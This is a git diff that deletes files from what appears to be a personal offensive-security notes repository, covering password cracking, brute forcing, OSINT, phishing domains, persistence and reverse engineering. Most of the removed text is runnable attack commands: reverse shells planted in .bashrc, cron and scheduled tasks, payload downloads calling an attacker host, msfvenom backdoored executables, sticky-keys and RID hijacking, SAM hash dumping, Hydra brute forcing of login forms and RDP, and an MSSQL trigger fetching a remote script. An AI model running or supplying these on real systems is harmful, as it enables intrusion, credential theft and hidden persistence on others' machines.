md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h) - - if len(jerar)==0: - - print("\n Not Found.") - elif len(jerar)>2: - jerar.sort() - print("\nPossible Hashs:") - print("[+] "+str(algorithms[jerar[0]])) - print("[+] "+str(algorithms[jerar[1]])) - print("\nLeast Possible Hashs:") - for a in range(int(len(jerar))-2): - print("[+] "+str(algorithms[jerar[a+2]])) - else: - jerar.sort() - print("\nPossible Hashs:") - for a in range(len(jerar)): - print("[+] "+str(algorithms[jerar[a]])) - - first = None - except KeyboardInterrupt: - print("\n\n\tBye!") - exit() \ No newline at end of file diff --git a/hashes/hash_cracker.py b/hashes/hash_cracker.py deleted file mode 100755 index ee89b3a..0000000 --- a/hashes/hash_cracker.py +++ /dev/null 
@@ -1,20 +0,0 @@
-#!/usr/bin/env python
-
-import hashlib
-import pyfiglet
-
-print(pyfiglet.figlet_format("md5 cracker"))
-
-wordlist_location = str(input("Wordlist file location: "))
-hash_input = str(input("Enter hash to be cracked: "))
-
-with open(wordlist_location, 'rb') as _f:
- for line in _f.readlines():
- line = line.strip()
- hash_ob = hashlib.sha256(line)
- #hash_ob = hashlib.md5(line)
- hashed_pass = hash_ob.hexdigest()
- print(line)
- if hashed_pass == hash_input:
- print("Password found: " + line.decode())
- exit(0)
diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md
deleted file mode 100644
index 948a63c..0000000
--- a/hashes/hashcat_utils.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# Hashcat Utilities
-
-* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
-
-## Wordlists
-
-* Combine wordlists
-```sh
-combinator wordlist.txt otherwordlist.txt > newwordlist.txt
-```
-
-* Create wordlist
-```sh
-hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
-```
-
-## Using Masks
-
-* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
-* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
-* Bruteforcing seven lowerspace characters using `SHA2-384` as an example
-```sh
-hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
-```
diff --git a/hashes/namely b/hashes/namely
deleted file mode 160000
index 8736d08..0000000
--- a/hashes/namely
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 8736d08a096695069b1d5cfa7ac20e5a874980db
diff --git a/hashes/password_cracking/colabcat b/hashes/password_cracking/colabcat
deleted file mode 160000
index 3e6dcae..0000000
--- a/hashes/password_cracking/colabcat
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 3e6dcae3fb2b917d16d2cf527c6f4538200fc081
diff --git a/hashes/password_cracking/hydra.md b/hashes/password_cracking/hydra.md
deleted file mode 100644
index 1902f78..0000000
--- a/hashes/password_cracking/hydra.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Hydra usage
-
-## Examples
-
-* HTTP post form
-```sh
-hydra -l -P MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
-```
-* HTTP basic auth
-```sh
-hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
-```
-
-
-|Command|Description|
-|-------|-----------|
-|`hydra -P -v `|Brute force against a protocol of your choice|
-|`hydra -v -V -u -L -P -t 1 -u `|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
-|`hydra -t 1 -V -f -l -P rdp://`|Attack a Windows Remote Desktop with a password list.|
-|`hydra -l -P . $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
-
-## Parameter
-
-|Option|Decription|
-|------|----------|
-|-l|Single username|
-|-P|Indicates use the following wordlist|
-|http-post-form|indicates the method|
-|/login url|the login URL|
-|:username|the form field where the username is entered|
-|^USER^|tells Hydra to use the username from -l|
-|password|the formfield where the password is entered|
-|^PASS^|tells Hydra to use the wordlist from -P|
-|Login|indicates to Hydra the login failed message|
-|Login failed|is the login failure message that the form returns|
-|F=incorrect|If this word appears on the page, login failed|
-|-V| verbose|
diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md
deleted file mode 100644
index 3a51428..0000000
--- a/hashes/password_cracking/john.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# John The Ripper
-
-* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-# Usage
-
-* Example
-```sh
-john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
-```
-
-## Declaring Structure
-* List subformat
-```sh
-john --list=subformats
-```
-```sh
-john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2
-```
-
-## Rules
-* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml)
-* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf`
-* Create config for mutations, e.g. border mutation
-```sh
-[List.Rules:border]
-$[0-9]$[0-9]
-```
-* Run john with parameter `--rules=border`
-
-### Existing Rules
-* `l33t`, l33tsp34k
-* `NT`, case mutation
-* Example for `best64`
-```sh
-john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
-```
-
-### Subformats
-* Some salted passwords need dynamic rules
-```sh
-john --list=subformats
-```
diff --git a/hashes/password_cracking/smb_challenge.md b/hashes/password_cracking/smb_challenge.md
deleted file mode 100644
index 9204451..0000000
--- a/hashes/password_cracking/smb_challenge.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# SMB Response Request
-
-* Network traffic of the SMB handshake is needed
-* Fields are
- * username
- * domain
- * server challenge
- * ntproofstring
- * NTLMv2Response with ommited hex of type like 'ntlmProofStr' at the start
-
-## Usage
-
-* Format the fields
-```sh
-username::domain:serverChallenge:ntproofstring:NTLMv2Response
-```
-
-* Use john to decrypt
-
diff --git a/hashes/password_cracking/sucrack.md b/hashes/password_cracking/sucrack.md
deleted file mode 100644
index 132fba8..0000000
--- a/hashes/password_cracking/sucrack.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# sucrack
-
-* [Repo](https://github.com/hemp3l/sucrack.git)
-* Upload to target and build
-```sh
-sucrack -u -w 100
-```
-
diff --git a/hashes/password_cracking/vnc.md b/hashes/password_cracking/vnc.md
deleted file mode 100644
index 9903c26..0000000
--- a/hashes/password_cracking/vnc.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# VNC Password Decoding
-
-* Found passwords in vnc config files may be decoded via
-```sh
- echo -n "" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
-```
diff --git a/hashes/password_guessing/standard_passwords.md b/hashes/password_guessing/standard_passwords.md
deleted file mode 100644
index 92a116b..0000000
--- a/hashes/password_guessing/standard_passwords.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# Initial Passwords
-
-* Services and products sometimes have credentials set initially.
-
-* [default-password](https://default-password.info)
-* [datarecovery](https://datarecovery.com/rd/default-passwords/)
-
-
-
diff --git a/hashes/wordlistctl b/hashes/wordlistctl
deleted file mode 160000
index 62b4721..0000000
--- a/hashes/wordlistctl
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 62b472187bfd789badcfbfd73fe75934bab1a969
diff --git a/osint/LeetLinked b/osint/LeetLinked
deleted file mode 160000
index 9032c97..0000000
--- a/osint/LeetLinked
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 9032c973e413199990b77e73a7d3896e3f5ba77f
diff --git a/osint/osint_links.txt b/osint/osint_links.txt
deleted file mode 100644
index 5a62e65..0000000
--- a/osint/osint_links.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-https://urlscan.io/
-https://abuse.ch
-https://bazaar.abuse.ch/
-https://feodotracker.abuse.ch/
-https://sslbl.abuse.ch/
-https://urlhaus.abuse.ch/
-https://threatfox.abuse.ch/
-https://www.phishtool.com/
-https://talosintelligence.com/
diff --git a/osint/recon_ng.md b/osint/recon_ng.md
deleted file mode 100644
index 63dd6e9..0000000
--- a/osint/recon_ng.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# recon-ng
-
-[Homepage](https://github.com/lanmaster53/recon-ng)
-[Repo](https://salsa.debian.org/pkg-security-team/recon-ng)
diff --git a/osint/social_engineering/gophish.md b/osint/social_engineering/gophish.md
deleted file mode 100644
index 9bc9ef0..0000000
--- a/osint/social_engineering/gophish.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# Gophish
-
-* [Repo](https://github.com/gophish/gophish.git)
-
-## Usage
-
-* Create
- * Send profile
- * Landing page
- * Email templates
- * User groups
- * New Campaign
diff --git a/osint/social_engineering/phishing_domain.md b/osint/social_engineering/phishing_domain.md
deleted file mode 100644
index 5ddf071..0000000
--- a/osint/social_engineering/phishing_domain.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# Phishing Domains
-
-* Use an old, unused domain.
-* Typosquatting, register a similar domain.
-* Use similar looking chars from unicode.
diff --git a/osint/spiderfoot.md b/osint/spiderfoot.md
deleted file mode 100644
index c94964d..0000000
--- a/osint/spiderfoot.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Spiderfoot
-
-* OSINT online spider
-* [Repo & releases](https://github.com/smicallef/spiderfoot.git)
-* Start server locally via
-```sh
-python sf.py -l 127.0.0.1:5000
-```
diff --git a/osint/theharvester.md b/osint/theharvester.md
deleted file mode 100644
index f00c05c..0000000
--- a/osint/theharvester.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# theharvester
-
-[Homepage](https://github.com/laramies/theHarvester)
-[Repo](https://gitlab.com/kalilinux/packages/theharvester.git)
diff --git a/persistence/bashrc.md b/persistence/bashrc.md
deleted file mode 100644
index bcd46a5..0000000
--- a/persistence/bashrc.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Bashrc Bogus
-
-## Add Reverse Shell
-```sh
-echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc
-```
-
-
diff --git a/persistence/crontab.md b/persistence/crontab.md
deleted file mode 100644
index 50df63c..0000000
--- a/persistence/crontab.md
+++ /dev/null
@@ -1,15 +0,0 @@
-# Cronjobs
-
-* `crontab -l`
-* `cat /etc/crontab`
-
-## Add Cronjob
-* Add line
-```sh
-* * * * * root curl http://:8000/shell.sh | bash
-```
- * Shell content
- ```sh
- bash -c "bash -i >& /dev/tcp// 0&1"
- ```
-
diff --git a/persistence/meterpreter.md b/persistence/meterpreter.md
deleted file mode 100644
index e13b02c..0000000
--- a/persistence/meterpreter.md
+++ /dev/null
@@ -1,6 +0,0 @@
-# Meterpreter Persistence
-
-## Load shell on system startup
-```sh
-run persistence -X
-```
diff --git a/persistence/persistence.md b/persistence/persistence.md
deleted file mode 100644
index 065d02a..0000000
--- a/persistence/persistence.md
+++ /dev/null
@@ -1,323 +0,0 @@
-# Persistence
-
-* Gain through
- * Startup folder persistence
- * Editing registry keys
- * Scheduled tasks
- * SUID
- * BITS
- * Creating a backdoored service
- * Creat user
- * RDP
-
-## Gain Persistence on Windows
-* Browser. Add to trusted sites.
-* Powershell
-```sh
-Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe
-```
-* DOSprompt
-```cmd
-certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe"
-```
-### Background Intelligence Transfer Service (BITS)
-```sh
-bitsadmin /create __shell__
-bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe"
-```
-```sh
-bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe"
-bitsadmin /SetMinRetryDelay 30
-bitsadmin /resume
-```
-
-## Elevate Privileges
-* Create user `net user /add `
-* Add to admin group via `net localgroup administrators /add`
-* Check `net localgroup Administrator`
-
-### More stealthy
-
-* Backup Operator group is more stealthy, no admin by r/w on files
-```sh
-net localgroup "Backup Operators" /add
-net localgroup "Remote Management Users" /add
-```
-* The following two groups are assigned through membership of `Backup Operators`
- * SeBackupPrivilege, read files
- * SeRestorePrivilege, write files
-
-* Any local group is stripped of off its admin permissions when logging in via RDP.
Therefore disable the following regkey via
-```sh
-reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
-```
-* Afterwards, check if `Backup Operators` is enabled via `whoami /groups`
-* Backup `SAM` and `SYSTEM` via
-```sh
-reg save hklm\system system.bak
-reg save hklm\sam sam.bak
-download system.bak
-download sam.bak
-secretsdump.py -sam sam.bak -system system.bak LOCAL
-```
-* Pass-the-hash via evil-winrm
-
-### secedit
-
-* Get r/w on files through editing a config file
-* Export secedit and open it
-```sh
-secedit /export /cfg config.inf
-```
-* Add user to the groups
-```sh
-SeBackupPrivilege = [...],
-SeRestorePrivilege = [...],
-```
-* Convert the file
-```sh
-secedit /import /cfg config.inf /db config.sdb
-secedit /configure /db config.sdb /cfg config.infk
-```
-* Add the user to the RDP group via net localgroup like before or do
-```sh
-Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
-```
-* Add & Click user -> Full Control(All Operations)
-* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before
-
-### Relative ID (RID)
-
-* UID like in linux
- * Administrator has `RID = 500`
- * Other interactive users `RID >= 1000`
-* Get RIDs
-```sh
- wmic useraccount get name,sid
-```
-* Assign `500` to regular user
-```sh
- PsExec64.exe -i -s regedit
-```
-* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>`
-* Search for RID value as hexadecimal value
-* Open the key called `F` and change effective RID at position `0x30`
-* Insert LE hex of `0d500`, which is `f401`
-
-## Add to registry
-
-* Execute on user logon via
-```sh
-reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f
-```
-
-## Add a Service
-
-### Meterpreter
-
-* Inside meterpreter `load powershell` and `powershell_shell`
-```sh
-New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot"
-```
-
-###
Powershell
-
-* Start a service automatically
-```sh
-sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
-sc.exe start SteamUpdater
-```
-
-* Use a service PE instead
-```sh
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
-```
-
-* Modify an existing service
- * Enumerate all the services
-```sh
-sc.exe query state=all
-```
- * Info about a specific service, start type should be automatic, service start name should be target user
-```sh
-sc.exe qc
-```
- * Reconfigure
-```sh
-sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
-sc.exe start FoundService
-```
-
-## Add Scheduled Task
-
-```sh
-$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
-$B = New-ScheduledTaskTrigger -AtLogOn
-$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
-$D = New-ScheduledTaskSettingsSet
-$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
-Register-ScheduledTask ReverseShell -InputObject $E
-```
-
-* Alternatively via `schtasks`
-```sh
-schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM
-```
- * Check task
-```sh
-schtasks /query /tn SteamUpdater
-```
-
-* Deleting Security Descriptor of a task to make it invisible.
Delete the following key
-```sh
-HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\\SD
-```
-
-## File Backdoor
-
-### Mimic PE
-```sh
-msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe
-```
-
-### Reference Script
-* Recycle shortcut of an app to reference a reverse shell script
- * Right click -> `Properties` -> `Target`
-* Reference the the script `certainlynobackdoor.ps1` via
-```sh
-powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
-```
-* Content of the script `certainlynobackdoor.ps1`
-```sh
-Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
-C:\Windows\System32\calc.exe
-```
-
-### File Association
-
-* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\`
-* Choose a class and `/shell/open/command` contains the file to be opened as the first argument `%1`
-* Chang the argument to a shell script and pass the arg through it
-```sh
-Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
-C:\Windows\system32\NOTEPAD.EXE $args[0]
-```
-* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1`
-
-
-## Persistence via Logon
-
-### Startup directories
-* Users' Startup directory under
-```sh
-C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
-```
-
-* Startup directory for all users, put the reverse shell here
-```sh
-C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
-```
-
-### Registry Keys
-
-* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
-* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce`
-* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`
-* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce`
-
-* Create `Expandable String Value` under any of this keys with the value of the reverse shell path
-
-
-*
`HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done
- * Either `shell` or `Userinit` can be appended with a comma separated command
-
-### Logon Scripts
-
-* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts
-
-* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload
-
-
-## RDP or Login Screen
-
-### Sticky Keys
-* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed
-* Take ownership of the binary via
-```sh
-takeown /f c:\Windows\System32\sethc.exe
-icacls C:\Windows\System32\sethc.exe /grant Administrator:F
-```
-* Overwrite with `cmd.exe`
-```sh
-copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
-```
-
-### Utilman
-
-* Ease of access button is clickable at the login screen, it is executed with system privileges
-* Take ownership and overwrite with `cmd.exe`
-```sh
-takeown /f c:\Windows\System32\utilman.exe
-icacls C:\Windows\System32\utilman.exe /grant Administrator:F
-copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
-```
-
-## Web Shell
-
-* Default user is `iis apppool\defaultapppool`
-* Has `SeImpersonatePrivilege`
-
-* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx)
-* Move shell to `C:\inetpub\wwwroot` on target
-* Get the shell via `http://$TARGET_IP/shell.aspx`
-
-## MSSQL
-
-* Triggers bind actions such as INSERTs
-
-* Open Microsoft SQL Server Management Studio
- * Choose windows auth
- * `New Query`
- * Enable Advance Options via
-```sh
-sp_configure 'Show Advanced Options',1;
-RECONFIGURE;
-GO
-
-sp_configure 'xp_cmdshell',1;
-RECONFIGURE;
-GO
-```
- * Grant privileges to all users
-```sh
-USE master
-GRANT IMPERSONATE ON LOGIN::sa to [Public];
-```
-
- * Change to DB
-```sh
-USE
-```
-
- * Create trigger
-```sh
-CREATE TRIGGER [sql_backdoor]
-ON HRDB.dbo.Employees
-FOR INSERT AS
-
-EXECUTE AS LOGIN =
'sa'
-EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
-```
-
-* Trigger the trigger by visiting the site which triggers the trigger through a db call
-
diff --git a/persistence/wmi.md b/persistence/wmi.md
deleted file mode 100644
index 6d09ef1..0000000
--- a/persistence/wmi.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# WMI Backdoor
-
-* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git)
diff --git a/reverse engineering/SCDBG b/reverse engineering/SCDBG
deleted file mode 160000
index 95dcf1d..0000000
--- a/reverse engineering/SCDBG
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 95dcf1d6a6072c6110dd99311b49d7734d17ce5e
diff --git a/reverse engineering/android/misc.md b/reverse engineering/android/misc.md
deleted file mode 100644
index 1fbc8ff..0000000
--- a/reverse engineering/android/misc.md
+++ /dev/null
@@ -1,81 +0,0 @@
-# Misc
-
-* `Dalvik` is the JVM of Android
-
-## SMALI
-
-* `SMALI` is the byte code derived from Java.
-* Types
-```
-V void
-Z boolean
-B byte
-S short
-C char
-F float
-I int
-J long
-D double
-[ array
-```
-
-### Registers
-* Registers are 32 bits
-* Type long and double use two registers 32+32=64 bits
-* `.registers`, total number of regs in method
-* `.locals`, non parameter regs in method
-* Arguments of a method are put into registers from highest to lowest.
-* The object itself is a parameter to its method.
-
-* Register naming schemes are
-* Normal local register are name v0, v1, v2 ...
-* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers.
-
-
-## APK Structure
-
-* `AndroidManifest.xml`, binary XML
-* `classes.dex`, app code compilation as dex
-* `resource.arsc`, precompiled resources in XML
-* `res`, resource dir
-* `assets` app assets
-* `lib`, libraries
-* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk.
-
-## Tools
-
-* `jadx -d ` as a decompiler
-* dex2jar to convert apk to jar
-```sh
-d2j-dex2jar.sh /path/application.apk
-```
-* Dex to smali with `d2j-dex2smali`
-* jd-gui as decompiler
-* `apktool` smali source from apk
-
-* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git)
-* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git)
-* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git)
-* Proguard deobfuscates code
-* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git)
-* Burpsuite listener on Android emulator
-* [Drozer](https://github.com/FSecureLABS/drozer)
-```sh
-adb forward tcp:31415 tcp:31415
-drozer console connect
-run app.package.list -> see all the packages installed
-run app.package.info -a -> view package information.
-run app.package.attacksurface package_name
-run app.activity.info -f package_name
-run app.activity.start --component package name component_name
-```
-```sh
-run app.provider.info -a package_name
-run scanner.provider.finduris -a package_name
-run app.provider.query uri
-run app.provider.update uri --selection conditions selection_arg column data
-run scanner.provider.sqltables -a package_name
-run scanner.provider.injection -a package_name
-run scanner.provider.traversal -a package_name
-```
-
diff --git a/reverse engineering/docs/deobfuscation.md b/reverse engineering/docs/deobfuscation.md
deleted file mode 100644
index e5ee271..0000000
--- a/reverse engineering/docs/deobfuscation.md
+++ /dev/null
@@ -1,97 +0,0 @@
-# Deobfuscation
-
-## Principles of Obfuscation
-
-* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf)
-
-* These layers and what's obfuscated are:
- * __Code Element__
- * Layout
- * Controls
- * Data
- * Classes
- * Methods
- * __Software Component__
- * __Inter Component__
- * Library calls
- * Used Resources
- * __Application__
- * DRM System
- * Neural Networks
-
-## Evade Statical Rules
-
-* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation
- * __Array Transformation__
- * __Data Encoding__
- * __Data Procedurization__
- * __Data Splitting & Merging__
-
-### Splitting & Merging of Strings
-
-* Breaking signature by modifying data distribution inside the code
-* This may be done by modifying strings and functions through following measures
-
-* __Joining__
-```python
-"CAFFEE" + "BABE"
-```
-
-* __Reordering__
-```python
-a = "BABE"
-b = "CAFFEE"
-f"{b}{a}"
-```
-
-* __Whitespaces of functions which are not interpreted__
-```c
-int main ( void ) {
- printf ( "The answer is %d", 42 ) ;
-}
-```
-
-* __Adding ticks which are not interpreted__
-
-* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__
-
-### Adding Unnecessary Instructions
-
-* Obfuscation of layout and controls inside the code
-* __Junk Stubs__
-* __Separation of Related Code__
-* __Stripping Redundant Symbols__
-* __Meaningless Identifiers__
-* __Converting Explicit to Implicit Instructions__
-* __Dispatcher Based Controls Executed During Runtime__
-* __Probabilistic Control Flows__
-* __Bogus Control Flows__
-
-
-### Control Flow
-
-* Changing or adding to the flow of the code through change of conditions
-* Changes may be set to arbitrary code segments by __Opaque Predicates__
-* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the
reverse engineer
-
-### Protecting Data
-
-* Stripping and protecting
- * __Code Structure__
- * __Object names__
- * __File & Compilation Properties__
-
-* To strip symbols
-```sh
-strip --strip-all
-```
-
-* Check via
-```sh
-nm
-```
-
-## Usage
-
-* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
-* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__
diff --git a/reverse engineering/docs/dll_reversing.md b/reverse engineering/docs/dll_reversing.md
deleted file mode 100644
index 8899c40..0000000
--- a/reverse engineering/docs/dll_reversing.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# DLL Reversing
-
-* Start DLL on its own with the help a wrapper
-```C#
-HMODULE dll = LoadLibraryA("DLL.DLL");
-typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y)
-Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName");
-Add(1, 2);
-```
diff --git a/reverse engineering/docs/firmware.md b/reverse engineering/docs/firmware.md
deleted file mode 100644
index faaee1d..0000000
--- a/reverse engineering/docs/firmware.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Reversing Firmware
-
-## Tools
-* binwalk
-* unlzma
-* tar
-* [fat](https://github.com/attify/firmware-analysis-toolkit.git)
- * Create usable environment and start firmware inside it
- ```sh
- ./fat.py
- ```
-* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
-
-## Usage
-* Check image via `strings`
-* Check CRC via `cksum -a crc `
-* Use `binwalk` to extract. There are to methods
- * `-e` extract by offset
- * `--dd=".*"` by file extension
-
-### Mount JFFS2 File
-* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
-```sh
-rm -rf /dev/mtdblock0
-mknod /dev/mtdblock0 b 31 0
-mkdir /mnt/jffs2
-modprobe jffs2
-modprobe mtdram
-modprobe mtdblock
-dd if= of=/dev/mtdblock0
-mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
-```
-
-## Tips & Tricks
-* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)
diff --git a/reverse engineering/docs/function_mangling.md b/reverse engineering/docs/function_mangling.md
deleted file mode 100644
index d44db63..0000000
--- a/reverse engineering/docs/function_mangling.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Function Decoration
-
-* Done to imported functions in order to do interpositioning and identify the variants of the function.
-* [name mangling](https://en.wikipedia.org/wiki/Name_mangling)
diff --git a/reverse engineering/docs/scada.md b/reverse engineering/docs/scada.md
deleted file mode 100644
index b36c598..0000000
--- a/reverse engineering/docs/scada.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Supervisory Control and Data Acquisition (SCADA)
-
-* SCADA works as an aggregatio of the following systems
- * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
- * __Remote Terminal Unit (RTU)__, use for wide area telemetry
- * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
- * __Communication network__
-
-* Security is no first class citizen
-
-## Modbus
-
-* Developed by Modicon
-* Master/Slave, latter has an 8 bit address.
-* RS-485 Connector
-* Data registers 16 bit
- * Input register, 16 bit ro
- * Hold register, rw
- * Coil register, 1 bit rw
- * Discrete register, 1bit ro
-
-### Function Codes
-* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
-* RTU request inside of TCP segments, port 502
-
-* 1 __Read Coil__
-* 2 __Read Discrete Input__
-* 3 __Read Holding Registers__
-* 4 __Read Input Registers__
-* 5 __Write Single Coil__
-* 6 __Write Single Holding Register__
-* 15 __Write Multiple Coils__
-* 16 __Write Multiple Holding Registers__
-
-
diff --git a/reverse engineering/java/krakatau.md b/reverse engineering/java/krakatau.md
deleted file mode 100644
index c998327..0000000
--- a/reverse engineering/java/krakatau.md
+++ /dev/null
@@ -1,17 +0,0 @@
-# Krakatau
-
-## Usage
-* Get bytecode from `jar` file
-```sh
-krakatau-disassemble -r file.jar -out dissassemble.zip
-```
-* Generate bytecode
-```sh
-krakatau-assemble -out result.jar -r dissassembled/
-```
-* Do changes to the bytecode
-* Compile jar file
-```sh
-java -cp result.jar
-```
-
